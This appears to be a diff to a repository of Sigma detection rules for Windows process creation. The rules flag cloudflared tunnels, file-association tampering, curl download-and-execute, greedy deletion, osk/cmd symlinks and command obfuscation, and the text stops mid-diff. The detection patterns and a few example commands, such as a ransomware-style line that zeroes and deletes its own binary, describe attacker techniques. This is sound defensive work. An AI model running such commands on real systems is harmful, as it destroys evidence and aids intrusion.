SHA256=ae047e2095e46c3f9c518b2be67ec753f4f0aad23b261a361fcb6144dcdb63b4 + - SHA256=3153d2baa462978dd22ab33d1c2274ecc88c200225d6a3327f98d5b752d08f5c + - SHA256=f49cde976e628012c9db73e1c8d76081944ecf2297cdafeb78bb13290da274c4 + - SHA256=d2513e58bb03ccc83affde685c6ef987924c37ce6707d8e9857e2524b0d7e90f + - SHA256=bb67c7623ba92fe64ffd9816b8d5b3b1ea3013960a30bd4cf6e295b3eb5b1bad + - SHA256=b34b3c3a91e3165d1481f0b3ec23eab93a1cfba94345a6cbfe5b18ddbd48eac7 + - SHA256=f7848034e010d55f15e474ca998f96391e320ff29b00cfcc4c5e536529703e75 + - SHA256=b6fc9493778cbe3bfc062d73f5cc604bc0ff058bc5e5dc6aac87f3a4008b54b6 + - SHA256=f5c5e962577e2293c4ad10603816dce7cc273585969615fbf4e4bfa9eaff1688 + - SHA256=d14c52d9220b606f428a8fe9f7c108b0d6f14cf71e7384749e98e6a95962e68f + - SHA256=d3a0e1a79158f3985cd49607ebe0cdfcc49cb9af96b8f43aefd0cdfe2f22e663 + - SHA256=2fbbfc8299537ff80cadf9d0e27c223fe0ccb9052bf9d8763ad717bbfa521c77 + - SHA256=19074674c6fbdaa573b3081745e5e26144fdf7a086d14e0e220d1814f1f13078 + # Note: + # Accounts for the cloudflared binaries being renamed + # `tunnel` is optional, but has been included to reduce the possibility of parameter collision when not observed with known binary names selection_param: - - CommandLine|contains|all: - - -url - - tunnel - - CommandLine|contains: - - .exe -url - - .exe --url + - CommandLine|contains|all: + - -url + - tunnel + - CommandLine|contains: + - .exe -url + - .exe --url selection_other: - CommandLine|contains|all: + CommandLine|contains|all: - -url - -no-autoupdate condition: process_creation and ((selection_img and selection_param) or selection_other) diff --git a/sigma/builtin/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml b/sigma/builtin/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml index 1d66b1d2d..7f469c151 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cloudflared_tunnel_cleanup.yml @@ -1,8 +1,7 @@ title: Cloudflared Tunnel Connections Cleanup id: 7050bba1-1aed-454e-8f73-3f46f09ce56a status: experimental -description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" - flag in order to cleanup tunnel connections. +description: Detects execution of the "cloudflared" tool with the tunnel "cleanup" flag in order to cleanup tunnel connections. references: - https://github.com/cloudflare/cloudflared - https://developers.cloudflare.com/cloudflare-one/connections/connect-apps @@ -22,10 +21,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' tunnel ' - 'cleanup ' - CommandLine|contains: + CommandLine|contains: - '-config ' - '-connector-id ' condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_cloudflared_tunnel_run.yml b/sigma/builtin/process_creation/proc_creation_win_cloudflared_tunnel_run.yml index e8dd72ddf..14b104eac 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cloudflared_tunnel_run.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cloudflared_tunnel_run.yml @@ -1,9 +1,7 @@ title: Cloudflared Tunnel Execution id: 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 status: experimental -description: Detects execution of the "cloudflared" tool to connect back to a tunnel. - This was seen used by threat actors to maintain persistence and remote access - to compromised networks. +description: Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks. references: - https://blog.reconinfosec.com/emergence-of-akira-ransomware-group - https://github.com/cloudflare/cloudflared @@ -24,10 +22,10 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' tunnel ' - ' run ' - CommandLine|contains: + CommandLine|contains: - '-config ' - '-credentials-contents ' - '-credentials-file ' diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_assoc_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_assoc_execution.yml index 3dbc66a4c..bd0a8f157 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_assoc_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_assoc_execution.yml @@ -1,19 +1,12 @@ title: Change Default File Association Via Assoc id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 related: - - id: ae6f14e6-14de-45b0-9f44-c0986f50dc89 - type: similar + - id: ae6f14e6-14de-45b0-9f44-c0986f50dc89 + type: similar status: test -description: 'Detects file association changes using the builtin "assoc" command. - - When a file is opened, the default program used to open the file (also called - the file association or handler) is checked. File association selections are stored - in the Windows Registry and can be edited by users, administrators, or programs - that have Registry access or by administrators using the built-in assoc utility. - Applications can modify the file association for a given file extension to call - an arbitrary program when a file with the given extension is opened. - - ' +description: | + Detects file association changes using the builtin "assoc" command. + When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.001/T1546.001.md author: Timur Zinniatullin, oscd.community @@ -30,10 +23,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains: assoc + CommandLine|contains: assoc condition: process_creation and (all of selection_*) fields: - NewProcessName diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml index 03b53ce7d..373be0cfa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_assoc_tamper_exe_file_association.yml @@ -1,20 +1,12 @@ title: Change Default File Association To Executable Via Assoc id: ae6f14e6-14de-45b0-9f44-c0986f50dc89 related: - - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 - type: derived + - id: 3d3aa6cd-6272-44d6-8afc-7e88dfef7061 + type: derived status: test -description: 'Detects when a program changes the default file association of any extension - to an executable. - - When a file is opened, the default program used to open the file (also called - the file association or handler) is checked. File association selections are stored - in the Windows Registry and can be edited by users, administrators, or programs - that have Registry access or by administrators using the built-in assoc utility. - Applications can modify the file association for a given file extension to call - an arbitrary program when a file with the given extension is opened. - - ' +description: | + Detects when a program changes the default file association of any extension to an executable. + When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened. references: - https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/assoc author: Nasreddine Bencherchali (Nextron Systems) @@ -31,14 +23,14 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'assoc ' - exefile filter: - CommandLine|contains: .exe=exefile + CommandLine|contains: .exe=exefile condition: process_creation and (all of selection_* and not filter) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml index 688c7c07f..be153180c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_copy_dmp_from_share.yml @@ -1,8 +1,7 @@ title: Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE id: 044ba588-dff4-4918-9808-3f95e8160606 status: experimental -description: Detects usage of the copy builtin cmd command to copy files with the - ".dmp"/".dump" extension from a remote share +description: Detects usage of the copy builtin cmd command to copy files with the ".dmp"/".dump" extension from a remote share references: - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ author: Nasreddine Bencherchali (Nextron Systems) @@ -14,17 +13,18 @@ logsource: category: process_creation product: windows detection: + # Example: copy \\\\\\process.dmp C:\Users\process.dmp process_creation: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'copy ' - ' \\\\' - CommandLine|contains: + CommandLine|contains: - .dmp - .dump - .hdmp diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml index d49ddd2d5..bdd3f3910 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_curl_download_exec_combo.yml @@ -1,10 +1,9 @@ title: Curl Download And Execute Combination id: 21dd6d38-2b18-4453-9404-a0fe4a0cc288 status: test -description: Adversaries can use curl to download payloads remotely and execute them. - Curl is included by default in Windows 10 build 17063 and later. +description: Adversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later. references: - - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 + - https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983 # Dead Link author: Sreeman, Nasreddine Bencherchali (Nextron Systems) date: 2020/01/13 modified: 2023/03/06 @@ -21,7 +20,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - ' /c ' - 'curl ' - http diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_del_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_del_execution.yml index d3efb1e4b..7b5efef73 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_del_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_del_execution.yml @@ -1,18 +1,11 @@ title: File Deletion Via Del id: 379fa130-190e-4c3f-b7bc-6c8e834485f3 status: test -description: 'Detects execution of the builtin "del"/"erase" commands in order to - delete files. - +description: | + Detects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. - - Malware, tools, or other non-native files dropped or created on a system by an - adversary may leave traces to indicate to what was done within a network and how. - - Removal of these files can occur during an intrusion, or as part of a post-intrusion - process to minimize the adversary''s footprint. - - ' + Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. + Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint. references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase @@ -30,21 +23,19 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_del: - CommandLine|contains: + CommandLine|contains: - 'del ' - 'erase ' selection_flags: - CommandLine|contains: - - ' /f' - - ' /s' - - ' /q' + CommandLine|contains: + - ' /f' # Force deleting of read-only files. + - ' /s' # Delete specified files from all subdirectories. + - ' /q' # Quiet mode, do not ask if ok to delete on global wildcard condition: process_creation and (all of selection_*) falsepositives: - - False positives levels will differ Depending on the environment. You can use - a combination of ParentImage and other keywords from the CommandLine field - to filter legitimate activity + - False positives levels will differ Depending on the environment. You can use a combination of ParentImage and other keywords from the CommandLine field to filter legitimate activity level: low ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml index 8a0d4e6da..00c96edf1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_del_greedy_deletion.yml @@ -1,9 +1,7 @@ title: Greedy File Deletion Using Del id: 204b17ae-4007-471b-917b-b917b315c5db status: experimental -description: Detects execution of the "del" builtin command to remove files using - greedy/wildcard expression. This is often used by malware to delete content of - folders that perhaps contains the initial malware infection or to delete evidence. +description: Detects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence. references: - https://www.joesandbox.com/analysis/509330/0/html#1044F3BDBE3BB6F734E357235F4D5898582D - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/erase @@ -17,18 +15,20 @@ logsource: category: process_creation product: windows detection: + # Example: + # del C:\ProgramData\*.dll & exit process_creation: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_del: - CommandLine|contains: + CommandLine|contains: - 'del ' - 'erase ' selection_extensions: - CommandLine|contains: + CommandLine|contains: - \\\*.au3 - \\\*.dll - \\\*.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_dir_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_dir_execution.yml index af6d98c17..52ea556b1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_dir_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_dir_execution.yml @@ -1,8 +1,7 @@ title: Files And Subdirectories Listing Using Dir id: 7c9340a9-e2ee-4e43-94c5-c54ebbea1006 status: test -description: Detects usage of the "dir" command that is part of Windows batch/cmd - to collect information about directories +description: Detects usage of the "dir" command that is part of Windows batch/cmd to collect information about directories references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md author: frack113 @@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - 'dir ' - ' /s' - ' /b' diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_dosfuscation.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_dosfuscation.yml index f82df05e0..15b998429 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_dosfuscation.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_dosfuscation.yml @@ -19,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - ^^ - ^|^ - ',;,' @@ -35,6 +35,9 @@ detection: - ' s^et ' - ' s^e^t ' - ' se^t ' + # - '%%' + # - '&&' + # - '""' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_http_appdata.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_http_appdata.yml index a37e39808..9ac110720 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_http_appdata.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_http_appdata.yml @@ -1,9 +1,7 @@ title: Command Line Execution with Suspicious URL and AppData Strings id: 1ac8666b-046f-4201-8aba-1951aaec03a3 status: test -description: Detects a suspicious command line execution that includes an URL and - AppData string in the command line parameters as used by several droppers (js/vbs - > powershell) +description: Detects a suspicious command line execution that includes an URL and AppData string in the command line parameters as used by several droppers (js/vbs > powershell) references: - https://www.hybrid-analysis.com/sample/3a1f01206684410dbe8f1900bbeaaa543adfcd07368ba646b499fa5274b9edf6?environmentId=100 - https://www.hybrid-analysis.com/sample/f16c729aad5c74f19784a24257236a8bbe27f7cdc4a89806031ec7f1bebbd475?environmentId=100 @@ -24,11 +22,11 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: - - http + CommandLine|contains|all: + - http # captures both http and https - :// - '%AppData%' - NewProcessName|endswith: \cmd.exe + NewProcessName|endswith: \cmd.exe condition: process_creation and selection fields: - CommandLine diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml index d20d123b0..3b59c080c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_mklink_osk_cmd.yml @@ -1,10 +1,7 @@ title: Potential Privilege Escalation Using Symlink Between Osk and Cmd id: e9b61244-893f-427c-b287-3e708f321c6b status: test -description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility - on-screen keyboard binary (osk.exe) using "mklink". This technique provides an - elevated command prompt to the user from the login screen without the need to - log in. +description: Detects the creation of a symbolic link between "cmd.exe" and the accessibility on-screen keyboard binary (osk.exe) using "mklink". This technique provides an elevated command prompt to the user from the login screen without the need to log in. references: - https://github.com/redcanaryco/atomic-red-team/blob/5c1e6f1b4fafd01c8d1ece85f510160fc1275fbf/atomics/T1546.008/T1546.008.md - https://ss64.com/nt/mklink.html @@ -23,10 +20,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - mklink - \osk.exe - \cmd.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml index 54acc8878..cc1ebfac7 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml @@ -1,8 +1,7 @@ title: VolumeShadowCopy Symlink Creation Via Mklink id: 40b19fa6-d835-400c-b301-41f3a2baacaf status: stable -description: Shadow Copies storage symbolic link creation using operating systems - utilities +description: Shadow Copies storage symbolic link creation using operating systems utilities references: - https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment author: Teymur Kheirkhabarov, oscd.community @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - mklink - HarddiskVolumeShadowCopy condition: process_creation and selection diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml index f43463677..18e55e61f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_net_use_and_exec_combo.yml @@ -1,9 +1,7 @@ title: Suspicious File Execution From Internet Hosted WebDav Share id: f0507c0f-a3a2-40f5-acc6-7f543c334993 status: test -description: Detects the execution of the "net use" command to mount a WebDAV server - and then immediately execute some content in it. As seen being used in malicious - LNK files +description: Detects the execution of the "net use" command to mount a WebDAV server and then immediately execute some content in it. As seen being used in malicious LNK files references: - https://twitter.com/ShadowChasing1/status/1552595370961944576 - https://www.virustotal.com/gui/file/a63376ee1dba76361df73338928e528ca5b20171ea74c24581605366dcaa0104/behavior @@ -21,15 +19,15 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|contains: \cmd.exe - - OriginalFileName: Cmd.EXE + - NewProcessName|contains: \cmd.exe + - OriginalFileName: Cmd.EXE selection_base: - CommandLine|contains|all: + CommandLine|contains|all: - ' net use http' - '& start /b ' - \DavWWWRoot\ selection_ext: - CommandLine|contains: + CommandLine|contains: - '.exe ' - '.dll ' - '.bat ' diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_no_space_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_no_space_execution.yml index 8813c172d..7dbb5c300 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_no_space_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_no_space_execution.yml @@ -1,12 +1,9 @@ title: Cmd.EXE Missing Space Characters Execution Anomaly id: a16980c2-0c56-4de0-9a79-17971979efdd status: test -description: 'Detects Windows command lines that miss a space before or after the - /c flag when running a command using the cmd.exe. - +description: | + Detects Windows command lines that miss a space before or after the /c flag when running a command using the cmd.exe. This could be a sign of obfuscation of a fat finger problem (typo by the developer). - - ' references: - https://twitter.com/cyb3rops/status/1562072617552678912 - https://ss64.com/nt/cmd.html @@ -23,19 +20,19 @@ detection: process_creation: EventID: 4688 Channel: Security - selection1: - CommandLine|contains: + selection1: # missing space before the /c + CommandLine|contains: - cmd.exe/c - - \cmd/c + - \cmd/c # just cmd/c would be prone to false positives - '"cmd/c' - cmd.exe/k - - \cmd/k + - \cmd/k # just cmd/k would be prone to false positives - '"cmd/k' - cmd.exe/r - - \cmd/r + - \cmd/r # just cmd/r would be prone to false positives - '"cmd/r' - selection2: - CommandLine|contains: + selection2: # special cases verified via Virustotal Enterprise search + CommandLine|contains: - /cwhoami - /cpowershell - /cschtasks @@ -46,8 +43,8 @@ detection: - /kschtasks - /kbitsadmin - /kcertutil - selection3: - CommandLine|contains: + selection3: # missing space after the /c + CommandLine|contains: - cmd.exe /c - cmd /c - cmd.exe /k @@ -55,7 +52,7 @@ detection: - cmd.exe /r - cmd /r filter_generic: - CommandLine|contains: + CommandLine|contains: - 'cmd.exe /c ' - 'cmd /c ' - 'cmd.exe /k ' @@ -63,9 +60,9 @@ detection: - 'cmd.exe /r ' - 'cmd /r ' filter_fp: - - CommandLine|contains: AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules - - CommandLine|endswith: cmd.exe/c . - - CommandLine: cmd.exe /c + - CommandLine|contains: AppData\Local\Programs\Microsoft VS Code\resources\app\node_modules + - CommandLine|endswith: cmd.exe/c . + - CommandLine: cmd.exe /c condition: process_creation and (1 of selection* and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml index fd6f24bc1..9101bb0d5 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_ntdllpipe_redirect.yml @@ -1,9 +1,7 @@ title: NtdllPipe Like Activity Execution id: bbc865e4-7fcd-45a6-8ff1-95ced28ec5b2 status: test -description: Detects command that type the content of ntdll.dll to a different file - or a pipe in order to evade AV / EDR detection. As seen being used in the POC - NtdllPipe +description: Detects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe references: - https://web.archive.org/web/20220306121156/https://www.x86matthew.com/view_post?id=ntdll_pipe author: Florian Roth (Nextron Systems) @@ -19,7 +17,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: + CommandLine|contains: - type %windir%\system32\ntdll.dll - type %systemroot%\system32\ntdll.dll - type c:\windows\system32\ntdll.dll diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_path_traversal.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_path_traversal.yml index 8a2dc199e..1b2a353ac 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_path_traversal.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_path_traversal.yml @@ -1,8 +1,7 @@ title: Potential CommandLine Path Traversal Via Cmd.EXE id: 087790e3-3287-436c-bccf-cbd0184a7db1 status: test -description: Detects potential path traversal attempt via cmd.exe. Could indicate - possible command/argument confusion/hijacking +description: Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking references: - https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/ - https://twitter.com/Oddvarmoe/status/1270633613449723905 @@ -20,23 +19,23 @@ detection: EventID: 4688 Channel: Security selection_img: - - ParentProcessName|endswith: \cmd.exe - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: cmd.exe + - ParentProcessName|endswith: \cmd.exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: cmd.exe selection_flags: - - ParentCommandLine|contains: - - /c - - /k - - /r - - CommandLine|contains: - - /c - - /k - - /r + - ParentCommandLine|contains: + - /c + - /k + - /r + - CommandLine|contains: + - /c + - /k + - /r selection_path_traversal: - - ParentCommandLine: /../../ - - CommandLine|contains: /../../ + - ParentCommandLine: /../../ + - CommandLine|contains: /../../ filter_java: - CommandLine|contains: \Tasktop\keycloak\bin\/../../jre\bin\java + CommandLine|contains: \Tasktop\keycloak\bin\/../../jre\bin\java condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - Java tools are known to produce false-positive when loading libraries diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml index 9d09605ec..7528b10fa 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_ping_copy_combined_execution.yml @@ -1,8 +1,7 @@ title: Suspicious Ping/Copy Command Combination id: ded2b07a-d12f-4284-9b76-653e37b6c8b0 status: experimental -description: Detects uncommon one-liner command having ping and copy at the same time, - which is usually used by malware. +description: Detects uncommon one-liner command having ping and copy at the same time, which is usually used by malware. references: - Internal Research author: X__Junior (Nextron Systems) @@ -14,18 +13,19 @@ logsource: category: process_creation product: windows detection: + # Note: In the case of sysmon and similar logging utilities, see this discussion https://github.com/SigmaHQ/sigma/discussions/4277 process_creation: EventID: 4688 Channel: Security selection_cmd: - - NewProcessName|endswith: \cmd.exe - - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe selection_cli: - CommandLine|contains: + CommandLine|contains: # Count - ' -n ' - ' /n ' - CommandLine|contains|all: - - ping + CommandLine|contains|all: + - ping # Covers "ping" and "ping.exe" - 'copy ' - ' /y ' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml index 3aca194ae..d5ea096f6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_ping_del_combined_execution.yml @@ -1,9 +1,7 @@ title: Suspicious Ping/Del Command Combination id: 54786ddc-5b8a-11ed-9b6a-0242ac120002 status: test -description: Detects a method often used by ransomware. Which combines the "ping" - to wait a couple of seconds and then "del" to delete the file in question. Its - used to hide the file responsible for the initial infection for example +description: Detects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example references: - https://blog.sygnia.co/kaseya-ransomware-supply-chain-attack - https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf @@ -19,24 +17,26 @@ logsource: category: process_creation product: windows detection: + # Note: In the case of sysmon and similar logging utilities, see this discussion https://github.com/SigmaHQ/sigma/discussions/4277 + # Example: "C:\Windows\System32\cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 "C:\Users\User\Desktop\lockbit\lockbit.exe" & Del /f /q "C:\Users\User\Desktop\lockbit\lockbit.exe". process_creation: EventID: 4688 Channel: Security selection_count: - CommandLine|contains: + CommandLine|contains: - ' -n ' - ' /n ' selection_nul: - CommandLine|contains: Nul + CommandLine|contains: Nul # Covers "> Nul" and ">Nul " selection_del_param: - CommandLine|contains: + CommandLine|contains: - ' /f ' - ' -f ' - ' /q ' - ' -q ' selection_all: - CommandLine|contains|all: - - ping + CommandLine|contains|all: + - ping # Covers "ping" and "ping.exe" - 'del ' condition: process_creation and (all of selection_*) falsepositives: diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_redirect.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_redirect.yml index 3512cb875..99e5c77f1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_cmd_redirect.yml +++ b/sigma/builtin/process_creation/proc_creation_win_cmd_redirect.yml @@ -1,11 +1,10 @@ title: CMD Shell Output Redirect id: 4f4eaa9f-5ad4-410c-a4be-bc6132b0175a related: - - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 - type: similar + - id: 8e0bb260-d4b2-4fff-bb8d-3f82118e6892 + type: similar status: test -description: Detects the use of the redirection character ">" to redicrect information - in commandline +description: Detects the use of the redirection character ">" to redicrect information in commandline references: - https://ss64.com/nt/syntax-redirection.html author: frack113 @@ -22,18 +21,17 @@ detection: EventID: 4688 Channel: Security selection_cmd: - - OriginalFileName: Cmd.Exe - - NewProcessName|endswith: \cmd.exe + - OriginalFileName: Cmd.Exe + - NewProcessName|endswith: \cmd.exe selection_cli: - CommandLine|contains: '>' + CommandLine|contains: '>' filter_idm_extension: - CommandLine|contains: + CommandLine|contains: - C:\Program Files (x86)\Internet Download Manager\IDMMsgHost.exe - chrome-extension:// - \\.\pipe\chrome.nativeMessaging condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - Internet Download Manager extensions use named pipes and redirection via CLI. - Filter it out if you use it in your environment + - Internet Download Manager extensions use named pipes and redirection via CLI. Filter it out if you use it in your environment level: low ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml b/sigma/builtin/process_creation/proc_creation_win_cmd_redirection_susp_folder.yml index 